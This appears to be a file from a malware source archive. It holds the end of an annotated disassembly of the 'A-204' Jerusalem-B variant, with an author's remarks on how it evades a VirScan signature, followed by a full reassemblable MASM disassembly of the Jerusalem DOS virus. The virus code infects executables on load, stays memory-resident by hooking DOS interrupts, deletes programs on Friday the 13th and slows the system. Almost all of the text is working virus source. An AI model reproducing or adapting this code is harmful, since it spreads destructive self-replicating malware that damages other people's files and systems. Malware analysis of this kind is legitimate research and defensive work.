044C 50 PUSH AX
044D 53 PUSH BX
044E 51 PUSH CX
044F 52 PUSH DX
0450 56 PUSH SI
0451 57 PUSH DI
0452 1E PUSH DS
0453 06 PUSH ES
0454 FC CLD
0455 8B FA MOV DI,DX ;
0457 32 D2 XOR DL,DL ; DL=00h : Take Default Drive
0459 80 7D 01 3A CMP B[DI+1],03A ; ':' at 2nd place in ASCIZ-
; filename
045D 75 05 JNE 0464 ; No: -> 0464h
045F 8A 15 MOV DL,B[DI] ; Get Drive Letter
0461 80 E2 1F AND DL,01F ; Get Drive Code
; 0 = Default
; 1 = A
; 2 = B, etc.
0464 B4 36 MOV AH,036 ;
0466 CD 21 INT 021 ; Get disk space
; BX=# of available clusters
; CX=Bytes per sector
; DX=Total clusters
0468 3D FF FF CMP AX,-1 ; No Sectors Free?
046B 75 03 JNE 0470 ; No: -> 0470h
046D E9 77 02 JMP 06E7 ; Yes: -> 06E7h
0470 F7 E3 MUL BX ; Calculate Free Space
0472 F7 E1 MUL CX ;
0474 0B D2 OR DX,DX ;
0476 75 05 JNE 047D ;
0478 3D 10 07 CMP AX,0710 ; 1808 Bytes Free?
047B 72 F0 JB 046D ; No: -> 046Dh
047D 2E 8B 16 80 00 CS MOV DX,W[080] ; Restore DX's ASCIZ Filename
0482 1E PUSH DS
0483 07 POP ES
0484 32 C0 XOR AL,AL ; AL=00h
0486 B9 41 00 MOV CX,041 ;
0489 F2 AE REPNE SCASB ; Check if filename
048B 2E 8B 36 80 00 CS MOV SI,W[080] ; is in UPPERCASE
0490 8A 04 MOV AL,B[SI] ;
0492 0A C0 OR AL,AL ; All UPPERRCASE?
0494 74 0E JE 04A4 ; IF so: -> 04A4h
0496 3C 61 CMP AL,061 ; AL<'a' ?
0498 72 07 JB 04A1 ; Yes: -> 04A1h
049A 3C 7A CMP AL,07A ; AL>'z' ?
049C 77 03 JA 04A1 ; Yes: -> 04A1h
049E 80 2C 20 SUB B[SI],020 ; Transfer filename
; into UPPERCASE
04A1 46 INC SI ; SI=SI+1
04A2 EB EC JMP 0490
04A4 B9 0B 00 MOV CX,0B ; CX=0Bh
04A7 2B F1 SUB SI,CX ; Return SI to start
; of Filename
04A9 BF 84 00 MOV DI,084 ; Start of COMMAND.COM
; filename
04AC 0E PUSH CS
04AD 07 POP ES
04AE B9 0B 00 MOV CX,0B
04B1 F3 A6 REPE CMPSB ; Filename=COMMAND.COM ?
04B3 75 03 JNE 04B8 ; No: -> 04B8h
04B5 E9 2F 02 JMP 06E7 ; Yes: -> 06E7h
; We come here if the
; loaded program is not
; COMMAND.COM
04B8 B8 00 43 MOV AX,04300 ;
04BB CD 21 INT 021 ; Get File Attributes
04BD 72 05 JB 04C4 ; If Error: -> 04C4h
04BF 2E 89 0E 72 00 CS MOV W[072],CX ; Store File Attributes
04C4 72 25 JB 04EB ; If Error: -> 04EBh
04C6 32 C0 XOR AL,AL ; AL=00h
04C8 2E A2 4E 00 CS MOV B[04E],AL ; Dummy=0
04CC 1E PUSH DS ;
04CD 07 POP ES ;
04CE 8B FA MOV DI,DX ;
04D0 B9 41 00 MOV CX,041 ;
04D3 F2 AE REPNE SCASB ;
04D5 80 7D FE 4D CMP B[DI-2],04D ; "M" ?
04D9 74 0B JE 04E6 ; Yes: -> 04E6h
04DB 80 7D FE 6D CMP B[DI-2],06D ; "m" ?
04DF 74 05 JE 04E6 ; Yes: -> 04E6h
04E1 2E FE 06 4E 00 CS INC B[04E] ; Dummy=Dummy+1
04E6 B8 00 3D MOV AX,03D00 ; Open Disk File with
04E9 CD 21 INT 021 ; handle in compatibility
; mode
; DS:DX : -> ASCIZ Filename
04EB 72 5A JB 0547 ; IF Error: -> 0547h
04ED 2E A3 70 00 CS MOV W[070],AX ; Store File Handle
04F1 8B D8 MOV BX,AX ; BX=File Handle
04F3 B8 02 42 MOV AX,04202 ; Move File Read/Write
; Pointer (LSEEK) with
; offset from end of file
04F6 B9 FF FF MOV CX,-1 ; CX:DX = offset in bytes
04F9 BA FB FF MOV DX,-5 ;
04FC CD 21 INT 021 ;
; DX:AX = new absolute
; offset from beginning of
; file
04FE 72 EB JB 04EB ; If Error: -> 04EBh
0500 05 05 00 ADD AX,5 ; ????
0503 2E A3 11 00 CS MOV W[011],AX ; Store Length of File
0507 B9 05 00 MOV CX,5 ; Read from a file with
050A BA 6B 00 MOV DX,06B ; handle BX 5h bytes into
050D 8C C8 MOV AX,CS ; DS:DX buffer
050F 8E D8 MOV DS,AX ;
0511 8E C0 MOV ES,AX ;
0513 B4 3F MOV AH,03F ;
0515 CD 21 INT 021 ;
0517 8B FA MOV DI,DX ; DI=DX=6Bh
0519 BE 05 00 MOV SI,5 ; SI=05h
051C F3 A6 REPE CMPSB ; Check first 5 bytes to see
; if a file already is
; infected
051E 75 07 JNE 0527 ; If not: -> 0527h
0520 B4 3E MOV AH,03E ; Close a file with
0522 CD 21 INT 021 ; handle
0524 E9 C0 01 JMP 06E7 ; Jump -> 06E7h
0527 B8 24 35 MOV AX,03524 ; Get original int 24h
052A CD 21 INT 021 ; vector. Stored in ES:BX
052C 89 1E 1B 00 MOV W[01B],BX ; Store BX of INT 24h vector
0530 8C 06 1D 00 MOV W[01D],ES ; Store ES of INT 24h vector
0534 BA 1B 02 MOV DX,021B ; Set new int 24h vector
0537 B8 24 25 MOV AX,02524 ; to DS:DX
053A CD 21 INT 021 ;
053C C5 16 80 00 LDS DX,[080] ; DS:DX=Filename
0540 33 C9 XOR CX,CX ; Get fileattributes
0542 B8 01 43 MOV AX,04301 ; Put File Attributes
0545 CD 21 INT 021 ; (CHMOD)
0547 72 3B JB 0584 ; If Error: -> 0584h
0549 2E 8B 1E 70 00 CS MOV BX,W[070] ; Close a file with
054E B4 3E MOV AH,03E ; handle BX
0550 CD 21 INT 021 ;
0552 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle=-1 ???
0559 B8 02 3D MOV AX,03D02 ; Open File with
055C CD 21 INT 021 ; Handle in READ/WRITE mode
055E 72 24 JB 0584 ; If Error: -> 0584h
0560 2E A3 70 00 CS MOV W[070],AX ; Store File Handle
0564 8C C8 MOV AX,CS
0566 8E D8 MOV DS,AX
0568 8E C0 MOV ES,AX
056A 8B 1E 70 00 MOV BX,W[070] ; BX=File Handle
056E B8 00 57 MOV AX,05700 ; Get File' date/time-
0571 CD 21 INT 021 ; stamp
0573 89 16 74 00 MOV W[074],DX ; Move File Read/Write Pointer
0577 89 0E 76 00 MOV W[076],CX ; (LSEEK) with offset from
057B B8 00 42 MOV AX,04200 ; beginning of file with
057E 33 C9 XOR CX,CX ; CX:DX bytes
0580 8B D1 MOV DX,CX ;
0582 CD 21 INT 021 ;
0584 72 3D JB 05C3 ; If Error: -> 05C3h
0586 80 3E 4E 00 00 CMP B[04E],0 ; '0'?
058B 74 03 JE 0590 ; Yes: -> 0590h
058D EB 57 JMP 05E6 ; JUMP -> 05E6h
058F 90 NOP
0590 BB 00 10 MOV BX,01000 ; Number of 16d-byte para-
; graphs BX=1000h For COM-
; files there are 1000h 16d
; bytes paragrahs available
0593 B4 48 MOV AH,048 ;
0595 CD 21 INT 021 ; Allocate Memory
0597 73 0B JAE 05A4 ; If enough memory available
; -> 05A4h
0599 B4 3E MOV AH,03E ; Close a file with
059B 8B 1E 70 00 MOV BX,W[070] ; handle BX
059F CD 21 INT 021 ;
05A1 E9 43 01 JMP 06E7 ; JUMP -> 06E7h
05A4 FF 06 8F 00 INC W[08F] ; Set Memory-Available
; Variable (0001h)
05A8 8E C0 MOV ES,AX ;
05AA 33 F6 XOR SI,SI ; SI=0000h
05AC 8B FE MOV DI,SI ; DI=0000h
05AE B9 10 07 MOV CX,0710 ; CX=0710h (1808d)
; length of virus
05B1 F3 A4 REP MOVSB ; Put virus code at begin-
; ning of buffer ES:DI
05B3 8B D7 MOV DX,DI ; DX=DI=0710h
05B5 8B 0E 11 00 MOV CX,W[011] ; Restore Length of File
05B9 8B 1E 70 00 MOV BX,W[070] ; Restore File Handle
05BD 06 PUSH ES ; Read from a file with
05BE 1F POP DS ; handle CX (length
05BF B4 3F MOV AH,03F ; of file) bytes in buffer
05C1 CD 21 INT 021 ; DS:DX
05C3 72 1C JB 05E1 ; If Error: -> 05E1h
05C5 03 F9 ADD DI,CX ; DI=Length of original
; file+0710h (length of
; viruscode)+05h
05C7 33 C9 XOR CX,CX ; CX=0000h
05C9 8B D1 MOV DX,CX ; Move file read/write
05CB B8 00 42 MOV AX,04200 ; pointer with offset from
05CE CD 21 INT 021 ; beginning of file
05D0 BE 05 00 MOV SI,5 ;
05D3 B9 05 00 MOV CX,5 ;
05D6 F3 2E A4 REP CS MOVSB ;
05D9 8B CF MOV CX,DI ; CX=0715h(1813d)+length of
; original code
05DB 33 D2 XOR DX,DX ; DX=0000h
05DD B4 40 MOV AH,040 ; Write to file with handle
05DF CD 21 INT 021 ; CX bytes
05E1 72 0D JB 05F0 ; If Error: -> 05F0h
05E3 E9 BC 00 JMP 06A2 ; JUMP -> 06A2h
05E6 B9 1C 00 MOV CX,01C ; Read CX (1Ch) bytes from
05E9 BA 4F 00 MOV DX,04F ; file with handle
05EC B4 3F MOV AH,03F ;
05EE CD 21 INT 021 ;
05F0 72 4A JB 063C ; If Error: -> 063Ch
05F2 C7 06 61 00 84 19 MOV W[061],01984 ; Store 1984h=6532d
05F8 A1 5D 00 MOV AX,W[05D] ;
05FB A3 45 00 MOV W[045],AX ;
05FE A1 5F 00 MOV AX,W[05F] ;
0601 A3 43 00 MOV W[043],AX ;
0604 A1 63 00 MOV AX,W[063] ;
0607 A3 47 00 MOV W[047],AX ;
060A A1 65 00 MOV AX,W[065] ;
060D A3 49 00 MOV W[049],AX ;
0610 A1 53 00 MOV AX,W[053] ;
0613 83 3E 51 00 00 CMP W[051],0 ; '0000'?
0618 74 01 JE 061B ; Yes: -> 061Bh
061A 48 DEC AX ; AX=AX-01h
061B F7 26 78 00 MUL W[078] ;
061F 03 06 51 00 ADD AX,W[051] ;
0623 83 D2 00 ADC DX,0 ;
0626 05 0F 00 ADD AX,0F ;
0629 83 D2 00 ADC DX,0 ;
062C 25 F0 FF AND AX,-010 ;
062F A3 7C 00 MOV W[07C],AX ; Store AX
0632 89 16 7E 00 MOV W[07E],DX ; Store DX
0636 05 10 07 ADD AX,0710 ; AX=AX+1808
0639 83 D2 00 ADC DX,0 ;
063C 72 3A JB 0678 ; If Error :-> 0678h
063E F7 36 78 00 DIV W[078] ;
0642 0B D2 OR DX,DX ;
0644 74 01 JE 0647 ;
0646 40 INC AX ; AX=AX+01h
0647 A3 53 00 MOV W[053],AX ;
064A 89 16 51 00 MOV W[051],DX ;
064E A1 7C 00 MOV AX,W[07C] ; Restore AX
0651 8B 16 7E 00 MOV DX,W[07E] ; Restore DX
0655 F7 36 7A 00 DIV W[07A] ;
0659 2B 06 57 00 SUB AX,W[057] ;
065D A3 65 00 MOV W[065],AX ;
0660 C7 06 63 00 C5 00 MOV W[063],0C5 ;
0666 A3 5D 00 MOV W[05D],AX ;
0669 C7 06 5F 00 10 07 MOV W[05F],0710 ;
066F 33 C9 XOR CX,CX ; CX=0000h
0671 8B D1 MOV DX,CX ; DX=0000h
0673 B8 00 42 MOV AX,04200 ; Move File Read/Write
0676 CD 21 INT 021 ; pointer to beginning of
; file
0678 72 0A JB 0684 ; If Error: -> 0684h
067A B9 1C 00 MOV CX,01C ; CX=1Ch
067D BA 4F 00 MOV DX,04F ; DX=4Fh
0680 B4 40 MOV AH,040 ; Write to file with
0682 CD 21 INT 021 ; handle
0684 72 11 JB 0697 ; If Error: -> 0697h
0686 3B C1 CMP AX,CX ; Are all bytes written?
0688 75 18 JNE 06A2 ; No: -> 06A2h
068A 8B 16 7C 00 MOV DX,W[07C] ; Restore AX into DX
068E 8B 0E 7E 00 MOV CX,W[07E] ; Restore DX into CX
0692 B8 00 42 MOV AX,04200
0695 CD 21 INT 021
0697 72 09 JB 06A2 ; If Error: -> 06A2h
0699 33 D2 XOR DX,DX ; DX=0000h
069B B9 10 07 MOV CX,0710 ; CX=0710h
069E B4 40 MOV AH,040
06A0 CD 21 INT 021
06A2 2E 83 3E 8F 00 00 CS CMP W[08F],0 ; Not Enough Memory?
06A8 74 04 JE 06AE ; Yes: -> 06AEh
06AA B4 49 MOV AH,049 ; Free memory
06AC CD 21 INT 021 ;
06AE 2E 83 3E 70 00 FF CS CMP W[070],-1
06B4 74 31 JE 06E7
06B6 2E 8B 1E 70 00 CS MOV BX,W[070] ; Restore File Handle
06BB 2E 8B 16 74 00 CS MOV DX,W[074] ; Restore File Date
06C0 2E 8B 0E 76 00 CS MOV CX,W[076] ; Restore File Time
06C5 B8 01 57 MOV AX,05701 ; Set File's Date/Time
06C8 CD 21 INT 021 ; stamp
06CA B4 3E MOV AH,03E ; Close a file with
06CC CD 21 INT 021 ; handle
06CE 2E C5 16 80 00 CS LDS DX,[080] ; Get place (DS:DX) of
; filename
06D3 2E 8B 0E 72 00 CS MOV CX,W[072] ; Restore File Attributes
06D8 B8 01 43 MOV AX,04301 ; Put File Attributes
06DB CD 21 INT 021 ;
06DD 2E C5 16 1B 00 CS LDS DX,[01B] ; Restore original vector
06E2 B8 24 25 MOV AX,02524 ; of interrupt 24h
06E5 CD 21 INT 021 ;
06E7 07 POP ES ; Restore Registers
06E8 1F POP DS
06E9 5F POP DI
06EA 5E POP SI
06EB 5A POP DX
06EC 59 POP CX
06ED 5B POP BX
06EE 58 POP AX
06EF 9D POPF ; Restore Flags
06F0 2E FF 2E 17 00 CS JMP D[017] ; Call original INT 21h
; address which was intercep-
; ted with the LOAD & EXEC.
; statement. Which means it
; will load and execute the
; selected file
06F5 00 00 00 00 00 00 00 00 00 00 00
0700 4D DE 0C 00 10 00 00 00 00 00 00 00 00 00 00 00
0710 E9 92 00 JMP 07A5 ; JUMP -> 07A5h
0711h til 07A4h are the same definition words/bytes as at 0103h til 0194h
07A5 FC CLD
07A6 B4 E0 MOV AH,0E0
07A8 CD 21 INT 021
07AA 80 FC E0 CMP AH,0E0 ; AH>=E0h?
07AD 73 16 JAE 07C5 ; Yes: -> 07C5h
07AF 80 FC 03 CMP AH,3 ; AH<03h
07B2 72 11 JB 07C5 ; Yes: -> 07C5h
; The only way that the
; code get passed here if
; the virus is active in
; memory. It will return
; AX=0300h then.
07B4 B4 DD MOV AH,0DD
07B6 BF 00 01 MOV DI,0100 ; DI=0100h
07B9 BE 10 07 MOV SI,0710 ; SI=0710h
07BC 03 F7 ADD SI,DI ; SI=0810h
07BE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=Length of file
07C3 CD 21 INT 021
07C5 8C C8 MOV AX,CS ; AX=CS
07C7 05 10 00 ADD AX,010 ; AX=AX+10h
07CA 8E D0 MOV SS,AX ; SS=CS+10h
07CC BC 00 07 MOV SP,0700 ; SP=0700h
07CF 50 PUSH AX ; Store AX
07D0 B8 C5 00 MOV AX,0C5 ; AX=00C5h
07D3 50 PUSH AX ; Store AX
07D4 CB RETF ; RETURN from FAR
07D5 FC CLD ; Clear Direct
; Here the A-204 variant
; differs from the original
; Jerusalem Version B virus
; for the second time.
07D6 2E 8C 06 31 00 CS MOV W[031],ES ; These two lines have
07DB 06 PUSH ES ; been changed in order
; trying to avoid being
; detected by the finger-
; print in the VirScan.Dat
; file. It has not succeeded
; because the strain VirScan
; searches for appears two
; times in the viruscode
07DC 2E 8C 06 39 00 CS MOV W[039],ES ; Store ES
07E1 2E 8C 06 3D 00 CS MOV W[03D],ES ; Store ES
07E6 2E 8C 06 41 00 CS MOV W[041],ES ; Store ES
07EB 8C C0 MOV AX,ES ; AX=ES
07ED 05 10 00 ADD AX,010 ; AX=AX+10h
07F0 2E 01 06 49 00 CS ADD W[049],AX ; Store ES+10h
07F5 2E 01 06 45 00 CS ADD W[045],AX ; Store ES+10h
07FA B4 E0 MOV AH,0E0 ; AH=E0h
07FC CD 21 INT 021 ;
07FE 80 FC E0 CMP AH,0E0 ; AH>=E0?
0801 73 13 JAE 0816 ; Yes: -> 0816h
; This will never happen.
; First of all it would be
; a short jump into the
; original program. Secondly
; is the virus already active
; in memory and will return
; AX=0300h at the INT 21h call
; with AH=E0h
0803 80 FC 03 CMP AH,3 ; AH=03h
0806 07 POP ES ; Restore ES
0807 2E 8E 16 45 00 CS MOV SS,W[045] ; Restore ES+10 into SS
080C 2E 8B 26 43 90 CS MOV SP,W[09043] ;
0810 90 NOP ; Start ofOriginal Program
0811 90 NOP
0812 90 NOP
0813 90 NOP
0814 90 NOP
0815 90 NOP
0816 90 NOP
0817 90 NOP
0818 90 NOP
0819 90 NOP
081A 90 NOP
081B 90 NOP
081C 90 NOP
081D 90 NOP
081E 90 NOP
081F 90 NOP
0820 90 NOP
0821 90 NOP
0822 90 NOP
0823 90 NOP
0824 90 NOP
0825 90 NOP
0826 90 NOP
0827 90 NOP
0828 90 NOP
0829 90 NOP
082A 90 NOP
082B 90 NOP
082C 90 NOP
082D 90 NOP
082E 90 NOP
082F C3 RET ; End of Original Program
0830 2D 32 30 34 2A ; -204*
NOTE: A-204 is a course-code for IAP (Inleiding Apparatuur en Programmatuur,
in English a Prologue in Hardware and Software) at my university. In this
course the PDP-11 Language is being teached. It's my opion, and my opion only,
that this change has been made by a first year student. The IAP-course is
a course for first years students. Only some lines were changed in order to
avoid detection. If the 'author' did know more about the 8086, (s?)he could
have optimized the code. Some pieces can be done much more elegant.
MSDOS/J-Index/Virus.MSDOS.Unknown.jerus.asm
+797
View File
@@ -0,0 +1,797 @@
; The 'Jerusalem' virus
; Disassembled by Joe Hirst (Tel: 0273-26105) January 1989.
; The disassembly has been tested by re-assembly using MASM 5.0
RAM SEGMENT AT 0
; System data
ORG 3FCH
BW03FC DW ?
BB03FE DB ?
ORG 2CH
ENV_SG DW ? ; Segment address of environment
RAM ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING,ES:RAM
START: JMP BP0010
DB 'sU'
VR_SIG DB 'MsDos'
VIR_RT EQU THIS DWORD
V_RTOF DW 0100H
V_RTSG DW 1C26H
DEL_SW DB 0 ; Delete program switch
BEGIN DW 0 ; Initial value for AX
F_SIZE DW 2A74H ; Total file size
INT_08 EQU THIS DWORD
I08OFF DW 00ABH ; Int 8 offset
I08SEG DW 17CDH ; Int 8 segment
INT_21 EQU THIS DWORD
I21OFF DW 1460H ; Int 21H offset
I21SEG DW 029FH ; Int 21H segment
INT_24 EQU THIS DWORD
I24OFF DW 0556H ; Int 24H offset
I24SEG DW 189BH ; Int 24H segment
TCOUNT DW 3A53H ; Timer count
; Fields passed by spare virus call
SPAR01 DW 0 ; 00 Spare call field 1 - AX
SP_RET EQU THIS DWORD
SPAR02 DW 0 ; 02 Spare call field 2 - IP
SPAR03 DW 0 ; 04 Spare call field 3 - CS
SPAR04 DW 0 ; 06 Spare call field 4 - SP
SPAR05 DW 0 ; 08 Spare call field 5 - SS
SPAR06 DW 0 ; 0A Spare call field 6
SPAR07 DW 0 ; 0C Spare call field 7
SPAR08 DW 0 ; 0E Spare call field 8
ST_ES1 DW 1BB5H ; Original ES
SET_PA DW 0080H
; Program parameter block
PPB_01 DW 0 ; Environment address
PPB_02 DW 0080H ; Command line offset
PPB_03 DW 1BB5H ; Command line segment
PPB_04 DW 005CH ; FCB1 offset
PPB_05 DW 1BB5H ; FCB1 segment
PPB_06 DW 006CH ; FCB2 offset
PPB_07 DW 1BB5H ; FCB2 segment
PRG_SP DW 0710H ; Initial stack pointer store
PRG_SS DW 14EDH ; Initial stack segment store
PROGRM EQU THIS DWORD
PRGOFF DW 00C5H ; Initial code offset store
PRGSEG DW 14EDH ; Initial code segment store
SS_ST1 DW 0246H
SS_ST2 DB 00A1H
EXE_SW DB 0 ; EXE switch - 0 = .COM extension
; .EXE header store
EXEHED DB 4DH, 5AH ; 00 .EXE header ident
EXHD01 DW 00F0H ; 02 Bytes in last page
EXHD02 DW 00B2H ; 04 Size of file in pages
EXHD03 DW 0138H ; 06 Number of relocation entries
EXHD04 DW 0060H ; 08 Size of header in paragraphs
EXHD05 DW 06D3H ; 0A Minimum extra storage required
EXHD06 DW -1 ; 0C Maximum extra storage required
EXHD07 DW 155EH ; 0E Initial stack segment
EXHD08 DW 0710H ; 10 Initial stack pointer
EXHD09 DW 1984H ; 12 Negative checksum
EXHD10 DW 00C5H ; 14 Initial code offset
EXHD11 DW 155EH ; 16 Initial code segment
DB 01EH, 000H, 000H, 000H
SIGBUF DB 037H, 020H, 02AH, 02AH, 02AH
F_HAND DW 5 ; File handle
F_ATTS DW 0020H ; File attributes
F_DATE DW 0F30H ; File date
F_TIME DW 6000H ; File time
BYTSEC DW 0200H ; Bytes per sector
PARAGR DW 0010H ; Size of a paragraph
F_SIZ1 DW 5BE0H ; Low-order file size
F_SIZ2 DW 1 ; High-order file size
F_PATH EQU THIS DWORD
FPTHOF DW 41B9H ; Program pathname offset
FPTHSG DW 9B2AH ; Program pathname segment
COM_CM DB 'COMMAND.COM'
MEM_SW DW 1 ; Memory allocated switch
DB 4 DUP (0)
; This section seems to assume a COM origin of 100H
BP0010:
CLD
MOV AH,0E0H ; Virus "are you there" call
INT 21H ; DOS service (Virus - 1)
CMP AH,0E0H ; Test for unchanged
JNB BP0020 ; Branch if invalid reply
CMP AH,3 ; Test for standard "yes"
JB BP0020 ; Branch if non-standard
MOV AH,0DDH ; Replace program
MOV DI,0100H ; Initial offset
MOV SI,OFFSET ENDADR ; Length of virus
ADD SI,DI ; Add initial offset
MOV CX,CS:F_SIZE[DI] ; Get total filesize
INT 21H ; DOS service (Virus - 2)
BP0020:
MOV AX,CS ; Get current segment
ADD AX,10H ; Address past PSP
MOV SS,AX ; \ Set up stack
MOV SP,0700H ; /
PUSH AX ; Segment for return
MOV AX,OFFSET BP0030 ; \ Offset for return
PUSH AX ; /
RETF ; "Return" to next instruction
; We now have an origin of zero
BP0030:
CLD
PUSH ES
MOV ST_ES1,ES ; Save original ES
MOV PPB_03,ES ; \
MOV PPB_05,ES ; ) Segments in PPB
MOV PPB_07,ES ; /
MOV AX,ES ; \ Segment relocation factor
ADD AX,10H ; /
ADD PRGSEG,AX ; Initial code segment store
ADD PRG_SS,AX ; Initial stack segment store
MOV AH,0E0H ; Virus "are you there" call
INT 21H ; DOS service (Virus - 1)
CMP AH,0E0H ; Test for unchanged
JNB BP0040 ; Branch if not
CMP AH,3 ; Test for standard "yes"
POP ES
MOV SS,PRG_SS ; Initial stack segment store
MOV SP,PRG_SP ; Initial stack pointer store
JMP PROGRM ; Start of actual program
; Virus is not already active
BP0040:
XOR AX,AX ; \ Address page zero
MOV ES,AX ; /
MOV AX,BW03FC ; \ Save system area data (1)
MOV SS_ST1,AX ; /
MOV AL,BB03FE ; \ Save system area data (2)
MOV SS_ST2,AL ; /
MOV BW03FC,0A5F3H ; Store REPZ MOVSW
MOV BB03FE,0CBH ; Store RETF
POP AX ; \
ADD AX,10H ; ) Address past PSP
MOV ES,AX ; /
PUSH CS ; \ Set DS to CS
POP DS ; /
MOV CX,OFFSET ENDADR ; Length of virus
SHR CX,1 ; Divide by two (word parameter)
XOR SI,SI
MOV DI,SI
PUSH ES
MOV AX,OFFSET BP0050
PUSH AX
DB 0EAH ; \ Far jump to move instruction
DW BW03FC, 0 ; /
BP0050:
MOV AX,CS
MOV SS,AX
MOV SP,0700H
XOR AX,AX ; \ Address page zero
MOV DS,AX ; /
ASSUME DS:RAM,ES:NOTHING
MOV AX,SS_ST1 ; \ Restore system area data (1)
MOV BW03FC,AX ; /
MOV AL,SS_ST2 ; \ Restore system area data (2)
MOV BB03FE,AL ; /
MOV BX,SP
MOV CL,4
SHR BX,CL
ADD BX,10H
MOV SET_PA,BX ; Save number of paragraphs
MOV AH,4AH ; Set block
MOV ES,ST_ES1 ; Get original ES
INT 21H ; DOS service (Set block)
MOV AX,3521H ; Get interrupt 21H
INT 21H ; DOS service (Get int)
MOV I21OFF,BX ; Save interrupt 21H offset
MOV I21SEG,ES ; Save interrupt 21H segment
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
MOV DX,OFFSET BP0130 ; Interrupt 21H routine
MOV AX,2521H ; Set interrupt 21H
INT 21H ; DOS service (Set int)
MOV ES,ST_ES1 ; Get original ES
ASSUME ES:RAM
MOV ES,ES:ENV_SG ; Get environment segment
XOR DI,DI ; Start of environment
MOV CX,7FFFH ; Allow for 32K environment
XOR AL,AL ; Search for zero
BP0060:
REPNZ SCASB ; Find zero
CMP ES:[DI],AL ; Is following character zero
LOOPNZ BP0060 ; Search again if not
MOV DX,DI ; Save pointer
ADD DX,3 ; Address pathname
MOV AX,4B00H ; Load and execute program
PUSH ES ; \ Set DS to ES
POP DS ; /
PUSH CS ; \ Set ES to CS
POP ES ; /
ASSUME DS:RAM,ES:NOTHING
MOV BX,OFFSET PPB_01 ; PPB (for load and execute)
PUSH DS
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
MOV AH,2AH ; Get date
INT 21H ; DOS service (Get date)
MOV DEL_SW,0 ; Set delete program switch off
CMP CX,07C3H ; Year = 1987
JZ BP0080 ; Branch if yes
CMP AL,5 ; Day of week = Friday
JNZ BP0070 ; Branch if not
CMP DL,0DH ; Day of month = 13
JNZ BP0070 ; Branch if not
INC DEL_SW ; Set delete program switch on
JMP BP0080
BP0070:
MOV AX,3508H ; Get interrupt 8
INT 21H ; DOS service (Get int)
MOV I08OFF,BX ; Save interrupt 8 offset
MOV I08SEG,ES ; Save interrupt 8 segment
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
MOV TCOUNT,7E90H ; Start clock count (30 mins)
MOV AX,2508H ; Set interrupt 8
MOV DX,OFFSET BP0100 ; Interrupt 8 routine
INT 21H ; DOS service (Set int)
BP0080:
POP DX
POP CX
POP BX
POP AX
POP ES
POP DS
ASSUME DS:NOTHING
PUSHF ; Fake an interrupt
CALL INT_21 ; Interrupt 21H (Load and execute)
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV AH,49H ; Free allocated memory
INT 21H ; DOS service (Free memory)
MOV AH,4DH ; Get return code of child process
INT 21H ; DOS service (Get return code)
MOV AH,31H ; Keep process
MOV DX,OFFSET ENDKEEP ; Length of program
MOV CL,4 ; \ Convert to paragraphs
SHR DX,CL ; /
ADD DX,10H ; And another 256 bytes
INT 21H ; DOS service (Keep process)
; Interrupt 24H
BP0090:
XOR AL,AL ; Ignore the error
IRET
; Interrupt 8
BP0100:
CMP TCOUNT,2 ; Is timer ready
JNZ BP0110 ; Branch if not
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH BP
MOV AX,0602H ; Scroll up two lines
MOV BH,87H ; Blinking white on black
MOV CX,0505H ; Start row 5 column 5
MOV DX,1010H ; End row 16 column 16
INT 10H ; VDU I/O
POP BP
POP DX
POP CX
POP BX
POP AX
BP0110:
DEC TCOUNT ; Subtract from timer count
JNZ BP0120 ; Branch if not zero
MOV TCOUNT,1 ; Set back to one
PUSH AX
PUSH CX
PUSH SI
MOV CX,4001H ; \ Waste some time
REPZ LODSB ; /
POP SI
POP CX
POP AX
BP0120:
JMP INT_08 ; Interrupt 8
; Interrupt 21H
BP0130:
PUSHF
CMP AH,0E0H ; Virus "are you there" call
JNZ BP0140 ; Branch if other call
MOV AX,0300H ; Standard "yes"
POPF
IRET
BP0140:
CMP AH,0DDH ; Virus replace program call
JZ BP0160 ; Branch if yes
CMP AH,0DEH ; Virus spare call
JZ BP0170 ; Branch if yes
CMP AX,4B00H ; Is it load and execute
JNZ BP0150 ; Branch if not
JMP BP0210 ; Process load and execute
BP0150:
POPF
JMP CS:INT_21 ; Interrupt 21H
; Replace program call
BP0160:
POP AX
POP AX ; Retrieve return offset
MOV AX,100H ; Replace with start address
MOV V_RTOF,AX ; Store in return jump
POP AX ; Retrieve return segment
MOV V_RTSG,AX ; Store in return jump
REPZ MOVSB ; Restore program to beginning
POPF
MOV AX,BEGIN ; Start with zero register
JMP VIR_RT ; Start actual program
; Spare virus call
BP0170:
ADD SP,6 ; Remove three words from stack
POPF
MOV AX,CS ; \
MOV SS,AX ; ) Set up internal stack
MOV SP,OFFSET ENDADR ; /
PUSH ES
PUSH ES
XOR DI,DI
PUSH CS ; \ Set ES to CS
POP ES ; /
MOV CX,10H ; Length to move
MOV SI,BX
MOV DI,OFFSET SPAR01
REPZ MOVSB ; Copy to SPAR01-SPAR08 inclusive
MOV AX,DS ; \ Set ES to DS
MOV ES,AX ; /
MUL PARAGR ; Size of a paragraph
ADD AX,SPAR06 ; \ Add
ADC DX,0 ; /
DIV PARAGR ; Size of a paragraph
MOV DS,AX
MOV SI,DX
MOV DI,DX
MOV BP,ES ; Save ES
MOV BX,SPAR08
OR BX,BX
JZ BP0190
BP0180:
MOV CX,8000H
REPZ MOVSW
ADD AX,1000H
ADD BP,1000H
MOV DS,AX
MOV ES,BP ; Restore ES
DEC BX
JNZ BP0180
BP0190:
MOV CX,SPAR07
REPZ MOVSB
POP AX ; Recover ES
PUSH AX ; Put it back again
ADD AX,10H ; Address past PSP
ADD SPAR05,AX ; Relocate SS
ADD SPAR03,AX ; Relocate ?
MOV AX,SPAR01
POP DS
POP ES
MOV SS,SPAR05
MOV SP,SPAR04
JMP SP_RET
; Friday 13th - Delete program
BP0200:
XOR CX,CX ; No attributes
MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
MOV AH,41H ; Delete directory entry
INT 21H ; DOS service (Delete entry)
MOV AX,4B00H ; Load and execute program
POPF
JMP INT_21 ; Interrupt 21H
; Process load and execute program
BP0210:
CMP DEL_SW,1 ; Test delete program switch
JZ BP0200 ; Branch to delete if on
MOV F_HAND,-1 ; No file handle
